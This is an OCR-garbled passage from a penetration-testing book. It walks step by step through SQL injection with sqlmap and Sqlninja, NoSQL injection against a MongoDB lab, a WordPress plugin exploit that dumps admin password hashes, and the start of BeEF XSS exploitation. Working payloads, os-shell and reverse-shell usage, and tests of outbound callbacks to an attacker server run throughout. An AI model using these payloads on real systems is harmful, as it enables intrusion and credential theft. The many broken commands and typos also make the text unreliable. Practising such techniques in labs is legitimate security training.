• ‘0F44FA14B9DFBBFFBDF2F7692868DE1B997C66ED 

• sendmail 

• M7A91042510E7E966EF4075A934A77A57A9E71FE 

• webcal 

• *E2E1F0A3459647AACF63319694BCBD107231B10C 

• citizens 

• ‘E0E85D302E82538A1FDA46B453F687F3964A99B4 

• yazdlO 

• ‘30B462BE16C04867D06113304F664BB9A5B573D8 

• sqlol 

• *1DB6D61428C07B8E8D6876CC60ECAD01D2CE844A 
SQLMap Results 


As you can see above, we didn’t need to remember any switches or parameters, but we were still 
able to dump the database. This makes SQL injections much quicker and leverages an easy-to-use 
GUI panel. 


Manual SQL Injection 


SOLmap (http://sqlmap.org/) (Kali Linux) 

The command line version has all the same functionality as through Burp. In the following examples, I 
will show both a GET parameter and a POST parameter example with SQLmap, since they are the 
most commonly identified types of SQLi. The reason I show both HTTP method attacks is because if 
you don't have the request properly configured, it is very likely the attack will fail. 


Here is a look at the help file for SQLmap. There are a lot of different switches that can be used for 

























SQLi attacks: sqlmap -h. 


Enumeration: 

These options can be used to enumerate the back-end database 
management system information, structure and data contained in the 
tables. Moreover you can run your own SQL statements 


-a, --all 
-b, --banner 

- -current-user 

- -current-db 

- - passwords 

- -1 ables 

- -columns 

- -schema 

- - dump 
--dump-all 
-D DB 

-T TBL 
-C COL 


Retrieve everything 

Retrieve DBMS banner 

Retrieve DBMS current user 

Retrieve DBMS current database 

Enumerate DBMS users password hashes 

Enumerate D3MS database tables 

Enumerate DBMS database table columns 

Enumerate DBMS schema 

Dump DBMS database table entries 

Dump all DBMS databases tables entries 

DBMS database to enumerate 

DBMS database table to enumerate 

DBMS database table column to enumerate 


Operating system access: 

These options can be used to access the back-end database management 
system underlying operating system 


--os-shell 

--os-pwn 


Prompt for an interactive operating system shell 
Prompt for an OOB shell, meterpreter or VNC 


General: 

These options can be used to set some general working parameters 


-batch 

• flush session 


Never ask for user input, use the default behaviour 
Flush session files for current target 


Miscellaneous: 
--wizard 


Simple wizard interface for beginner users 
(!) to see full list of options run with '-hh' 

I*] shutting down at 19:53:25 

rootekali:-# sqlmap -hj_ 


SQLMap Help Information 


GET Parameter Example 

In the following examples, we are going to assume that the GET parameter is where the SQLi 
vulnerability is located with the URL. We want to test every parameter and make sure that the SQLi 
vulnerability is really a finding. There are a good number of false positives I have seen with scanner 
tools, so validation is really the only method for ensuring the findings. Remember that if you do not 
specify a value to test, SQLmap will test every parameter by default. 


• Here is an example command to identify if an SQL injection vulnerability using the 
banner switch: 

• cd /opt/sqlmap 

• python ./sqlmap.py-u "http://site.com/info.php?user=test&pass=test" -b 


Lor example, we will attack our vulnerable virtual machine (OWASPBWA): 

• python ./sqlmap.py -u "http://192.168.1.124/mutillidae/index.php?page=user- 
info.php&username=asdf&password=sdf«feuser-info-php-submit- 
button=View+Account+Details" -b 




Type: UNION query 

Title: MySQL UNION query (NULL) - 5 columns 

Payload: page=user-info.php&usemame=asdf' UNION ALL SELECT NUL 
hp-submit-button=View Account Details 

'[18:28:41] [INFO] the back-end DBMS is MySQL 

[18:28:41] [WARNING] reflective value(s) found and filtering out 

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) 
web application technology: PHP 5.3.2, Apache 2.2.14 
back-end DBMS operating system: Linux Ubuntu 
;back-end DBMS: MySQL 5.0.12 
banner: '5.1.41-3ubuntul2.6-log' 


[*] shutting down at 18:28:41 

i:/opt/sqlmap# python ./sqlmap.py -u "http://192.168.1.124/ 
mutillidae/index.php ?page=use r-in f o .php&use rname=asdfSpassword=sd f& 
user-info-php-submit-button=View+Account+Details" -b 


SQLMap Results 


Retrieving the database username: 

• python ./sqlmap.py-u "http://site.com/info.php?user=test&pass=test" —current-user 
Interactive Shell 

• python ./sqlmap.py-u "http://site.com/info.php?user=test&pass=test" -os-shell 
Some hints and tricks: 

• You might need to define which type of database to attack. If you think an injection 
is possible, but SQLmap is not finding the issue, try to set the —dbms=[database type] 
flag. 

• If you need to test an authenticated SQL injection finding, log into the website via a 
browser and grab the Cookie (you can grab it straight from Burp Suite). Then, define 
the cookie using the —cookie=[COOKIE] switch. 

• Stuck? Try the command: sqlmap —wizard. 


POST Parameter Example 

POST examples are going to mimic GET injections, except for how the vulnerable parameter is 
passed. Instead of being in the URL, the POST parameters are passed in the data section. This is 
normally seen with username and passwords since the web servers generally log GET parameters 
and you wouldn't want the web server to log passwords. Also, there are size limitations with GET 
methods and, therefore, a lot of data will be passed via POST parameters for larger applications. 


Determining if an SQL inject is valid (the result will be the banner if valid): 

• python ./sqlmap.py-u "http://site.com/info.php " — data= "user=test&pass=test" -b 


For example, we will attack our vulnerable virtual machine (OWASPBWA): 

• python ./sqlmap.py -u "http://l 92.168.1.124/mutillidae/index.php?page=user- 
info.php&username=asdf&password=asdf«feuser-info-php-submit- 
button=View+Account+Details" -b 





Type: UNION query 

Title: MySQL UNION query (NULL) - 5 columns 

Payload: username=asdf 1 UNION ALL SELECT NULL,NULL,NULL,CONCAT( 
454a,0x716b7a7671),NULL#&password=adsf&login-php-submit-button=Logi 

[18:51:27] [INFO] the back-end DBMS is HySQL 

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) 
web application technology: PHP 5.3.2, Apache 2.2.14 
back-end DBMS operating system: Linux Ubuntu 
back-end DBMS: MySQL 5.0.12 
banner: '5.1.41-3ubuntul2.6-log' 


[*] shutting down at 18:51:27 

:/opt/sqlmap# python ./sqlmap.py -u "http://192.168.1.124/ 
mutillidae/index.php?page=login.php" --data="username=asdf&password 
=adsf&logln-php-submit -button=Login'' -b 


SQLMap Banner 


Retrieving the database username: 

• python ./sqlmap.py -u "http://site.com/info.php —data= "user=test&pass=test" — 
current-user 


Interactive Shell: 

• python ./sqlmap.py u "http://site.com/info.php —data= "user=test&pass=test" -os- 
shell 


If you are able to gain access to an os-shell, you will have full command line access as the database 
user. In the following example, I was able to find a vulnerable SQLi, gain an os-shell, and run an 
ipconfig command. 


os-shell> ipconfig 

do you want to retrieve the conaand standard output? [Y/n/a] 


command standard output: 

Connect ion-specific DNS Suffix 
Connect ion-specific DNS Suffix 

Default Gateway . 

Default Gateway . 

IP Address. 

IP Address. 

_Subnet Has>_ 


10.2.136.1 

10.2.130.1 

10.2.130.2 
10.2.130.2 

55.2S5.255 


SQLMap Command Shell 















I recommend spending some time getting used to running different SQLi commands and trying 
different switches identified in the help file. If SQLmap fails, it might be your configuration, so make 
sure you try using the Wizard setup, also. 


Sqlninja 

(http://sqlninja.sourceforge.net/) (Kali Linux) 


Sqlninja is another great SQL injection tool for uploading shells and evading network IDS systems 
against MSSQL databases. You might be asking: Why would I use Sqlninja if I have already become 
comfortable with SQLmap? From many years of experience, I have seen a large number of tests that 
identify SQLi with only one tool or the other. This might be due to a number of factors such as how it 
detects blind SQLi, how they upload binaries, how IPS signatures might detect one tool or the other, 
or how they handle cookies. There are so many different variables, and it would be smart to always 
double-check your work. 

Taking a look at the help file with the -h switch, we can see all the different functionality Sqlninja 
has: 


r30': sqlninja -h 

;Unknown option: h 
{Usage: /usr/bin/sqlninja 

m <mode> : Required. Available modes are: 

t/test • test whether the Injection is working 
f/fingerprint • fingerprint user, xp_cmdshell and more 
b/bruteforce • bruteforce sa account 
e/escalation ■ add user to sysadmin server role 
x/resurrectxp - try to recreate xp_c«dshell 
u/upload - upload a .scr file 
s/dirshell - start a direct shell 
k/backscan - look for an open outbound port 
r/revshell - start a reverse shell 
d/dnstunnel - attempt a dns tunneled shell 
i/icmpshell • start a reverse ICMP shell 
c/sqlcmd • issue a 'blind' OS command 
m/metasploit • wrapper to Metasploit stagers 
•f <file> : configuration file (default: sqlninja.conf) 

-p <password> : sa password 

-w <wordllst> : wordlist to use in bruteforce mode (dictionary method 
only) 

-g : generate debug script and exit (only valid in upload mode) i i 
-v : verbose output 
■d <mode> : activate debug 

1 - print each injected command 

2 print each raw HTTP request 

3 • print each raw HTTP response 
all • all of the above 

...see sqlninja-howto.html for details 


Sqlninja Help Page 


The only issue I have had with Sqlninja is that the configuration file is a bit more difficult to set up 
and I have never found great or easy-to-read documentation. So I will give two similar examples 
from SQLmap. 




In Sqlninja, you need to define the vulnerable variable to inject by using the _SQL2INJECT_ 

command. This is different from SQLmap, where we did not need to specify which field to test 
against. Let's go through a couple of examples since it should make things much clearer. Before we 
can use Sqlninja, we need to define the SQL configuration file. This will contain all the information 
about the URL, the type of HTTP method, session cookies, and browser agents. 


Let me show you the easiest way to obtain the information required for Sqlninja. As before, load up 
the Burp Suite and turn the proxy intercept on the request where the vulnerable field is passed. In the 
following example, we are going to capture requests sent to /wfLogin.aspx and identify the POST 
parameter values. This is going to have most of the information required for Sqlninja injections, but 
slight modifications will need to be made from the Burp Raw request. 


Let's take a look at one of the requests from Burp that identified a potential SQLi vulnerability: 


Request 


Raw 

Params 

Headers 

Hex 

ViewState 


POST /wfLogin.aspx HTTP/1.1 

Host: site.com 

User-Agent: Mozilla/5.0 (Xll; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 

Accept: text/html,application/xhtml+xml,application/xml;q-0.9,*/*;q-0.8 

Accept-Language: en-US,en;q»0. 7,it;q-0.3 

Accept-Charset: I90-8859-lS,utf-8;q«0 .7,*;q«0.7 

Referer: http://£akewebsite.com/wfLogin.aspx 

Cookie: ASP.NET_SessionId«3owsdevpwyrbjv4 5hltc4i4 5 

Connection: keep-alive 

Content-Type: application/x-www-form-urlencoded 
Cookie: ASPSESSIOHID-3dkDjb3jasfwefJGd 
Content-Length: 367 

Loginpanel H3AtxtUserName»admin&Loginpanel lt3AtxtPassword*admin6Loginpanel l\3Abt 
nLoginwLogin 

Burp Request Example 


In the next two examples, you will see how the most common GET and POST parameters are created. 
This can be used for any different type of HTTP method, but usually the POST and GET methods will 
be used. 

A few things to notice from the original Burp request versus how it will be entered in the Sqlninja 
configuration file are: 

• The HTTP Method (GET/POST) needs to be modified to include the full URL. Burp 
is missing the http://site.com in front of /wfLogin.aspx 

• You have to define which parameters to fuzz by adding the _SQL2INJECT_ 

string. 

• Sometimes for Sqlninja, you may need to try the attack by first closing the 
vulnerable SQL parameter. This can be done with ticks, quotes, or semi-colons. 


GET Parameter Example 

We are going to write the sql get.conf configuration file to our Kali desktop with two vulnerable 
parameters. Sqlninja will try to attack both the user and pass fields and try to validate if they are 












vulnerable. To create/modify the configuration file in a terminal, type: 

• gedit -/Desktop/sqlget.conf 

• Enter the following into the configuration file and save it: 

• —httprequeststart— 

GET http://site.com/wfLogin.aspx? 

user=test';_SQL2 INJECT_&pass=tesf;_SQL2 INJECT_HTTP/1.0 

Host: site.com 

User-Agent: Mozilla/5.0 (XI1; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 
Accept: text/xml, application/xml, text/html; q=0.9, text/plain; q=0.8, image/png,*/* 
Accept-Language: en-us, en; q=0.7, it;q=0.3 
Accept-Charset: ISO-8859-15, utf-8; q=0.7,*;q=0.7 
Content-Type: application/x-www-form-urlencoded 
Cookie: ASPSESSIONID=3dkDjb3jasfiveGGd 
Connection: close 
—httprequestend— 


POST Parameter Example 

A POST request differs from a GET in that the parameters are passed in the data section instead of 
being part of the URL. In a terminal, we need to create the configuration file and modify the 
parameters to inject into. In this example, we will inject into both the username and password: 

• gedit ~/Desktop/sql_post.conf 

• Enter the following into the configuration file and save it: 

• —httprequeststart— 

POST http://site.com/wflogin.aspx HTTP/1.0 
Host: site.com 

User-Agent: Mozilla/5.0 (XI1; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 
Accept: text/xml, application/xml, text/html; q=0.9, text/plain; q=0.8, image/png, */* 
Accept-Language: en-us, en; q=0.7, it;q=0.3 
Accept-Charset: ISO-8859-15, utf-8; q=0.7,*;q=0.7 
Content-Type: application/x-www-form-urlencoded 
Cookie: ASPSESSIONID=3dkDjb3jasfrveffGd 
Connection: close 

username=tesf;_SQL2 INJECT_&password=tesf;_SQL2 INJECT_ 

—httpreque stend- - 


Executing Sqlninja 

Whether you use a GET or POST method attack, executing your attack will be the same. Now that we 
have created a configuration file, we can use the following command to run Sqlninja: 

• sqlninja -mt -f-/Desktop/sql get.conf 


The following command says to run Sqlninja using the test mode to see if the injection works with the 
configuration file we just created. If you are lucky and do find a valid SQL injection, you can start to 
attack the database. In the following example, we are going to exploit our database, find the version, 
check to see if we are the "sa" account (who has administrative privileges), and see if we have 



access to a shell. 



:/usr/bin# sqlninja -f sqlninja.conf -m f 
Sqlninja rel. 0.2.6-rl 

Copyright (C) 2GO6-2011 icesurfer <r00t@northernfo 
[+] Parsing sqlninja.conf... 

[+] Target is: w , 30 

What do you want to discover ? 

0 - Database version (2000/2005/2008) 

1 - Database user 

2 - Database user rights 

3 - Whether xp_cmdshell is working 

4 - Whether mixed or Windows-only authentication 

5 - Whether SQL Server runs as System 

(xp_cmdshell must be available) 

6 - Current database name 
a - All of the above 

h - Print this menu 
q - exit 
> 0 

[+] Checking SQL Server version... 

Target: Microsoft SQL Server 2000 

> i 

[+] Checking whether we are sysadmin... 

We seem to be ' sa’ :) 

> 6 

[+] Finding Current DB length... 

Got it ! Length = 0 

[+3 Now going for the characters. 

Current DB is....: 

> 3 

[+) Checking whether xpcmdshell is available 
xp cmdshell seems to be available :) 




Sqlninja Example 


Once we have xpcmdshell available, we want to test that we have command line access and what 
types of privileges we have. In the example below we are exploiting the SQLi vulnerability and 
testing command line commands. 


During this specific test (image below), it looks like we might be running commands on the server, 
but we would need to validate this. The issue though, is that after setting up a listener on a server we 
own on the Internet, it doesn't look like we are seeing any connections from the compromised server 
outbound. This could be a problem if we wanted to exfiltrate data back to us or download additional 
malware. Since the command line console created by Sqlninja doesn't show the responses from 
commands, therefore, we need to validate that our commands are successfully executing. 

The best way to check if a command is working is by putting tcpdump to listen for pings on a server 
we own, which is publicly available on the Internet. By running ping commands on a compromised 
server, we can easily validate if our server is responding to pings. The reason we use pings is 
because ICMP is generally allowed outbound and is less likely to trigger IDS/IPS signatures. This 
can be configured with the following command on an external server owned by the attacker: 

• tcpdump -nnvXSs 0 -c2 icmp 


This command will log any pings sent to my server, which will allow me to validate that the server 
can talk outbound and that my commands are working. On my compromised SQLi host, I execute a 
simple ping back to my server. If it is successful, tcpdump will see the ICMP request. 


Command line SQLi attacks can be run with the following command: 
• sqlninja -f [configuration file] -me 


As we can see in the image below, I first tried to run telnet commands back to my server, but that was 
unsuccessful. I then tried to initiate ping commands back to my server, where tcpdump was listening. 
In this case, my attack was successful, which proved I could run full commands on this host, but it 
does not have web access back out. 

In the image below, the top portion is my server logging pings and the bottom image is the victim host, 
which is vulnerable to SQLi. Although the telnet commands seem to fail, the pings are successful. 



J -■»--— - -- - ] 

f tu4« tcp4u»p -nn*?t$l 4 ~<2 leap , 

tep-dump: listening on rthfl, link-type ENi.6*lS (Ethernet),. capture size 65535 bytes 
04:47:52*375099 IP ttOS 9x0, ttl 113, 14 3934, off let 0, flags [Mite], proto ICMP (U F length €0} 
> ' i$f ICMP etho request, 14 $13, ssq 9605, length 40 

09(4000: ASM 003c ftfSa 0000 7101 90QB adBc 3al6 E,.*.Z..q.. 

0 X 0010 ; i07e 72bc 00«0 274f 6206 2374 6162 0304 'M 1 ..«1abcd 

09(0028:: 6566 6768 696a 6b6c 6d6c 6f70 7173 7374 efghijklnnapqrst 

0x0030; 7576 7761 6263 6465 6657 6060 uvwflbcdcfghi 

04:47i$l 3?Si75 IP 4to* 0*0, ttl 04, id 4$&3, offset 0, flags IfKMMl, proto ICMP (1|* length 60) 
66 ■■ !: ICMP echo reply, id 512, seq 9685, length 40 

0X0000;: 4500 H3c 1129 6060 4001 M39 »7e Tide E»»4. L.0. .4’*r. 

0x0010:: ad0e 3 a It 6006 2fdf 6206 2374 6102 6304 .*:.../.. ,«>abcd 

1x6020; 6566 6766 696a 6l?6c 6d6e 6f76 7172 7374 efghijklarW^rst 
0x0030; 7576 7761 6263 64ts 666? 6669 ™bcd#f*bl 

2 packets captured 
2 packets received by filter 
6 packets dropped by kernel 


-/sql/sqlnmjo-0,2.999-olphol4 sudo ./sqlninja -f sql. 

: (j Ic: a) j 1 1 " ” ■ 6.2.969 - * l; t a: • n t t p: / / q Uin j a. £• f , vj •. - 
it) 2006-2613 icesurfer & nico 
1+] Pening iql.ccnl.i* 

[ + .| Loading extraction module:: l ib/g etdata.tiiie.pl 
I+j Port 60. Assuming cleartext 
[+] Target in 

[*] Starting blind coenand mode. Use "exit* to be dropped back to your shell. 
* telnet internet-ieen*«m;999 
[+] Comand has been sent and executed 

► telnet internet-lean+com 999 
|+I Cowand ties been sent and executed 

► ping internet-scan.com 

|>] Com a nd hat been lent and executed _ 

SQLMap Command Injection Ping 




If you have gotten this far and you aren't sure what to do next, you can jump to the Lateral Pass 
section to get an idea on next steps. This should give you enough details to help you start testing and 
practicing on vulnerable frameworks. Of course, these are the best scenario options, where the SQLi 
works without having to configure detailed settings about the database type, blind SQLi type, or other 
timing type issues. 


NoSQL Database Injections 

More and more, I am coming across NoSQL type databases on my penetration tests. If you aren’t 
familiar with NoSQL, try to build out a database and interact with it. The major difference between 
the two types of databases is that in a regular SQL database, it is structured and relational, while in a 
NoSQL database, it is based more on key/value pairs, allowing you to store any type of data. This is 
a very high explanation and takes a little time to understand why NoSQL databases are more 
beneficial compared to traditional relational databases. 














The two common types of NoSQL databases I come across are CouchDB and MongoDB. There has 
always been a consensus that SQL injections do not work on NoSQL databases. This isn’t completely 
true. While many of the normal SQL injection attacks do not work in its current fashion, it is still 
possible to accomplish many of the same goals. This is best demonstrated through the following 
example. In the next lab example, we will build a MongoDB server and vulnerable application. 


LAB: 


• git clone https://github.com/tcstool/NoSQLMap.git/opt/NoSQLMap 

• git clone https://github.com/cheetz/NoSQL_Test.git/opt/NoSQL_Test 

• apt-get install php5-dev php-pear 

• pear install -fpecl/mongo 

• peel install mongo 

• peel install ape 

• gedit/etc/php5/apache2/php.ini 

o add the following to the phi.ini file: 
o extension=mongo.so 

• service apache2 start 

• gedit/etc/mongodb.conf 

o Edit bind port to listen on any interface 
o bind ip = 0.0.0.0 

• mkdir /var/www/vuln_apps 

• mv /opt/NoSQL_Test/userdata.php /var/www/vuln_apps 

• service apache2 restart && service mongodb restart 


Next, we need to populate the MongoDB database. In a terminal window type: 

• mongo 

o use appUserData 
o db.createCollection("users") 
o show collections 

o db.users.insert({"name":"james","username":"james","email":"james 
o db .users.insert({ "name": "frank","username": "frank","email": "ffank@ 
o db.users.insert({"name":"paul","username":"paul","email":"paul@su< 


If everything worked out, it should look like this when you query a user: 



User Profile Lookup 


* # 


& 192.168.199.128/vuln.apps/userdata.php?usersearch= "v C | |H V Google 

® Most Visited'-' n Offensive Security *NKali Linux V Kali Docs HI Exploit-DE 

function () { var query = 'paul'; return this.username == query;} 
1 user found. 

Name: paul 
Username: paul 
Email: paul@suck.testlab 


Enter your username: 


paul 


Submit 


Sample Vulnerable NoSQL Application 


If you see this, that’s great! You have a MongoDB installation and webpage utilizing that backend 
NoSQL database. Now, we want to see if we can attack this MongoDB installation. In the following 
example, we are going to use a tool called NoSQLMap. 


root@kali: /opt/NoSQLMap 


File Edit View Search Terminal Help 


i \ i i 

I M I _ 

I • ' 1/ _ \ 


Jl _ II 
"Mill 
\| I I I I 


I |\ | (_) /\_/ /\ \/‘ / | 

\_| \_/\ _ /\ _ / \_/\_\ _ 


V I 

i\/i i/T'Trx 

_l I I I LI I IJ i 
_/\_l !_A_M •_/ 


NoSQLMap-vO.5 
nosqlmap@gmail.com 


1- Set options 

2- NoSQL DB Access Attacks 
NoSQL Web App attacks 
Scan for Anonymous MongoDB Access 
Change Platform (Current: MongoDB) 
Exit 


Select an option: f] 


n 


NoSQLMap 


We need to execute the nosqlmap.py script and set the vulnerable IP and GET parameters. 


Attacking MongoDB : 

• cd /opt/NoSQLMap 

• python nosqlmap.py 

• 1 - Set Options 

o Set options for target host IP (your Mongo IP) 

o Set App Path to: /vulnapps/userdata.php? 

usersearch=paul&submitbutton=Submit 














o set my local MonboDB IP (your host) 
o b - Save option file 
o x - to Exit 


We have now set the configuration of the vulnerable site, so let’s attack the web application that uses 
a MongoDB backend: 

• 3-NoSQL Web App attacks 

• Baseline test-Enter random string size: 5 

• 1-Alphanumeric 

• 1-usersearch 

NoSQLMap is taking each variable in the GET parameter and testing common NoSQL injection 
techniques. If everything is successful, you will see something like the following: 



root©kali: /opt/NoSQLMap 

File Edit View Search Terminal Help 


Test 8: PHP/ExpressJS > Undefined Injection 
Injection foiled. 

Start timing based tests Cy/n)? y 

Starting Javascript string escape time based injection... 

HTTP load time variance was 30.0 seconds! Injection possible. 
Starting Javascript integer escape time based injection,,, 

HTTP load time variance was only 0.6 seconds. Injection probabl 
MongoDB < 2 A detected. Start brute forcing database info (y/n) 


Vunerable URLs: 

http://192.168.199,128:80/vuln apps/userdata,ph^?usersearch=a i ; 
return db.a.findO; var dummy^'!Gsubmitbutton=$ubmit 
http://I92,168.199,128:80/vuln apps/userdata,php?usersearch=a l ; 
return this.a !='WC4Uo'; van dummy='!&submitbutfon=$ubmit 


Possibly vulnerable URLs: 
http://192.168.199,128:80/vuln_apps/userdata 
); var dummy=l&submitbutton=Submit 
http://192.168.199.128:80/vulnapps/userdata 
0ne(]; var dummy='!Ssubmitbutton=Submit 
http:7/192 -168 -199,128:80/vuln_apps/userdata 
ne{); var dummy=16submitbutton=Submit 
http://192,168.199,128:80/vuln_apps/userdata 
C4Uo; var dummy-l&submitbutton=Submit 


Timing based attacks: 

String at tack “Successful 
Integer attack-unsuccessful 
Save results to file fv/n)? 


NoSQLMap - Scanner Results 




1 1 r 

.php?usersearcb=j; 

,php?use[search=4t 

, php ?use 

.php?usersearch=l: r 


Right away, NoSQLMap identified two URLs that are vulnerable. Browsing those URLs, we see that 
the variable usersearch is vulnerable and that we can inject NoSQL commands into that GET 








parameter. 


• http://192.168.199.128:80/vuln_apps/userdata.php?usersearch=a'; return 
db.a.findQ; var dummy='!&submitbutton=Submit 


Running that query in a browser, we see something that is equivalent to a select * from usersearch; in 
SQL. 


&i.php?usersearch=a'; return db.a.findQ; var dumnr v- C |H V Google d| 

Most Visited'' n Offensive Security Kali Linux Kali Docs OExploit-DB 


function () { var query = 'a‘; return db.a.find(); var dummy='!'; return 
this.username == query;} 

3 user found. 

Name: james 
Username: james 
Email: james@suck.testlab 

Name: frank 
Username: frank 
Email: frank@suck.testlab 


Name: paul 
Username: paul 
Email: paul@suck.testlab 


Enter your username: 


Search 


Submit 


NoSQL Injection 


We have just dumped that Collection and dumped all the users. Although many people have stated that 
traditional SQL injection attacks do not work on noSQL databases, this is only partly true. The 
concept for SQL injection attacks against NoSQL technologies is still sound, regardless of database 
syntax. 


CMS - Content Management Systems 

To continue on the topic of vulnerable web applications, I am always finding different types of 
content management systems (CMS) through my penetration tests. From what I have seen, Nessus will 
pick up some of the CMS issues, but most are found through more manual testing. To help speed up 
the initial scans of CMS sites, I like to use a couple of tools, listed below. 


CMSmap Lab 

( https: / / github. com/Dionach/ CMS map ! (Kali Linux): 

CMSmap is a vulnerability scanner written by Dionach and automates and validates issues in 
numerous CMS applications. Let’s walk through an example from initial finding to exploitation. On 
our OWASPBWA VM, there is a WordPress site on which we can test the scanner: http://[Vulnerable 
OWASPBWA IP]/wordpress/. 











Il72.16.151 144/wordpres: 


3 


t Visited'*' i|Offensive Security XKali Linux X Kali Docs QExploit-DB ^Aircrack-ng 


^ C & 0^ 


Broken WordPress 


New Plug-ins 

Apr! I8O1.2011 

We have just enabled the WordPress Plugin Spreadsheet v0.6 as well 
as MyGallery 1.2.1. Content should be up in a few days for that! 

Posted in Uncategorized | No Comments *• 

This is a title 

Vulnerable Wordpress Site 


c 


Pages 

> About 


Archives 

» Apnl 2 
• Sept* i 


CMS sites have historically had huge numbers of vulnerabilities, so let’s scan this site using 
CMSmap to see what we can find: 

• cd /opt/CMSmap 

• ./cmsmap.py -t http://[Vulnerable OWASPBWA IP]/wordpress/ 





rootglkali: /opt/CMSmap 

File Edit View Search Terminal Help 


:/opt/CHSwap# ./cmsmap.py -t http://172.16.151.144/wordpress/ 

Date 6 Time: 19/02/2015 02:07:42 

Target: http://172.16.151.144/wordpress BA 

Website Not in HTTPS: http://172.16.151.144/wordpress l 
Server: Apache/2.2.14 (Ubuntu) «iod_mono/2.4.3 PHP/5.3.2-lubuntu4.5 with Suho 
sin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 QpenSSL/| 
0.9.8k Phusion_Passenger/3.0.17 mod_perl/2.0.4 Perl/v5.10.1 I 
X-Powered-By: PHP/5.3.2-lubuntu4.5 
X-Frame-Options: Not Enforced 
Strict-Transport-Security: Not Enforced 
X-Content-Security-Policy: Not Enforced 


[L] 


(-) 


CHS Detection: Wordpress 
Wordpress Version: 2.0 
Wordpress Theme: default 

Searching Vulnerable Theme from ExploitDB website 


EDB-ID 

EDB-ID 

EDB-ID 


Title: Wordpress Download Mana 


36043 
35879 

35533 Date: 2014-12-15 Verified: No 
:ger 2.7.4 - Remote Code Execution Vulnerability 
M] EDB-ID: 35543 

H] EDB-ID: 35341 Date: 2014-11-24 Verified: No Title: Wordpress wpDataTables 
M] EDB-ID: 10088 Date: 2009-11-10 Verified: Yes Title: WordPress 2.0 - 2.7.1 a| 
dmin.php Module Configuration Security Bypass Vulnerability 


EDB-ID: 

EDB-ID: 


9110 

30036 



Vulr 




jifijjheLJ 


itlej Wordpress 


nnf 


4= 2 2 3 A-a 

I_I LJv. 


I] wp-db-backup 

H] EDB-ID: 30979 Date: *00*014 
dmin/edit .php backup Parailietei 
H] EDB-ID: 28382 Date: 2006-08-14 Verified: Yes Title: WP-DB Backup For Wordp 
ess 1.6/1.7 Edit.PHP Directory Traversal Vulnerability ,q f^g jj^opg VOU S 
wpSS 

H] EDB-ID: 5486 Date: 2008-04-22 Verified: Yes Title: Wordpress Plugin Spread: 
|heet <=0.6 - SQL Injection Vulnerability 

I] Checking for Directory Listing Enabled ... 

CL) http://172.16.151.144/wordpress/wp-includes/ 

[L] http://172.16.151.144/wordpress/wp-content/plugins/akismet 
CL] http://172.16.151.144/wordpress/wp-content/plugins/wpSS 
(-] Date 6 Time: 19/02/2015 02:08:42 
[•] Completed in: 0:00:59 
root(Jkali:/opt/CHSiap» | 


CMSMap - Scanner Results 


A lot of different findings will come up and it is really just about playing around with them to find the 
right ones to exploit. In this case, we will take one of the verified vulnerabilities: 

• [M] EDB-ID: 5486 Date: 2008-04-22 Verified: Yes Title: Wordpress Plugin 
Spreadsheet <= 0.6 - SQL Injection Vulnerability 


A quick Google search of EDB-ID: 5486 points to: 

• http://www.exploit-db.com/exploits/5486/ 

• And the exploit code looks like this: wp-content/phigins/wpSS/ss_load.php? 
ss_id=l+and+ 

(I=0)+umon+select+l,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+flom+i 

-&display=plain 


So this looks to be an SQL injection vulnerability that queries the database for the users, passwords, 
and emails. Let’s open a browser to this page: 





• http://l 72.16.151. 144/wordpress/wp-content/plugins/wpSS/ss_load.php? 

ss_id=l+and+%281=0%29+union+select+l,concat%28user_login,0x3a,user_pass,0x3 
-&display=plain, we see the hash of the admin account. 

4k Meet the FoxyProxy ... * Broken WordPress x 4) WordPress Spreadsh... * ^ 

«- 
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u I u i i 1 44 id 

tx 

admin:21232f297a57a5a743894a0e4a801fc3:admin®exampl9,org 

WordPress Exploit 


Great-we just got the hash to the admin account, which we can crack and, if successful, connect back 
to the database or SSH into the server. 


For more in depth WordPress vulnerability scanning, look at also using WPScan 

f https://gi thub.com/wpscanteam/wpscan k 

• cd /opt/wpscan 

• ruby ./wpscan.rb —url http://[WordPress IP]/ 

WPScan is not only a vulnerability scanner for WordPress, but also has functionality for brute-forcing 
accounts, enumerating plugins, enumerating users, and other discovery tools. 


Cross-Site Scripting (XSS) 


I can't talk about web application vulnerabilities without talking about Cross-Site Scripting (XSS). 
This is probably one of the most common vulnerabilities that I come across. XSS is a user attack that 
is caused by a lack of input validation by the application. There are two types of XSS: reflective 
(non-persistent) and stored (persistent). Both allow an attacker to write script code into a user's 
browsers. I am going to focus on reflective XSS, which is the more common type and is relatively 
similar to stored XSS in terms of vulnerability exploitation. 


BeEF Exploitation Framework 

f http://beelproj ect.com/ XKali Linux) 


The general question I get from my clients is, "How much harm can an XSS really cause?" With this 
vulnerability you have the full ability to write scripting code on the end user's browser, so anything 
that you do in JavaScript could be used against the victim. In this section, we will dive into how 
malicious you can be with an XSS attack. 













The best tool I have seen used with XSS attacks is the BeEF Exploitation Framework. If you find an 
XSS, not only can you cause a victim to become part of your pseudo-botnet, but you can also steal the 
contents of the copy memory, redirect them to links, turn on their camera, and so much more. 


If you do find a valid XSS on a site, you will need to craft your XSS findings to utilize the BeEF 
Framework. For our XSS examples in this chapter, we are going to use an XSS that was identified 
from our initial Burp Active Scans. Fef s take the example vulnerable URF: 
http://www.securepla.net/xss_example/example.php?alert=tesf<script>[iframe]</script>. 

From the Setting Up a Penetration Box section, we installed BeEF into /opt/beeft. 


We are going to have to first start the BeEF service. 


Starting BeEF Commands: 

• cd /opt/beefr 

• ./beef 


File Edit View Search Terminal Help 


[15:56:16] 

[15:56:16] 

[15:56:16] 

[15:56:16] 

[15:56:16] 

[15:56:16] 

[15:56:16] 

[15:56:18] 

[15:56:26] 

[15:56:26] 

[15:56:26] 

[15:56:26] 

[15:56:26] 

[15:56:26] 

[15:56:26] 

[15:56:26] 

[15:56:26] 

[15:56:26] 

[15:56:26] 

[15:56:26] 

[15:56:26] 

[15:56:26] 

[15:56:26] 


Bind socket [imapeudoral] listening on [0.0.0.0:2000] 
Browser Exploitation Framework (BeEF) 0.4.6.0-alpha 
| Twit: @beefproject 

j Site: http://beefproject.com 

j Blog: http://blog.beefproject.com 

